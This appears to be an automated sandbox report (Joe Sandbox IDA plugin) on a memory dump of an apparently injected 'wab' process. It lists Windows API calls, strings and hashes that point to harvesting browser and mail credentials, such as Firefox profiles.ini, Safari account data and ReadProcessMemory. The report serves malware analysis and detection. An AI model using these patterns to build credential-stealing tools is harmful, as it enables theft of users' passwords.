  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• ??3@YAXPAX@Z.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7600DF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                                                      • String ID: OsError 0x%x (%u)
                                                                                                                                                                                                                      • API String ID: 403622227-2664311388
                                                                                                                                                                                                                      • Opcode ID: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                                      • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ff8ff26e0a1215cc788cdf92f51d6490e6f9aaf937717d3b4e57f86d92aad15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                                                        • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                        • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                                                      • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                                                      • API String ID: 577499730-1134094380
                                                                                                                                                                                                                      • Opcode ID: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                      • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c080f988ca695101769a9a2af36e28a34baa8032f69e666e27906f655dd48f7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                                                      • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                                                      • API String ID: 2787044678-1921111777
                                                                                                                                                                                                                      • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                      • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                                                      • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                                                      • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                      • API String ID: 2080319088-3046471546
                                                                                                                                                                                                                      • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                      • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
• Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
• Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
• Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
• Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
• Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
• Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
• Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
• Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
• Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
• Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
• Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 667068680-2887671607
                                                                                                                                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                      • API String ID: 1607361635-601624466
                                                                                                                                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1043902810-0
                                                                                                                                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
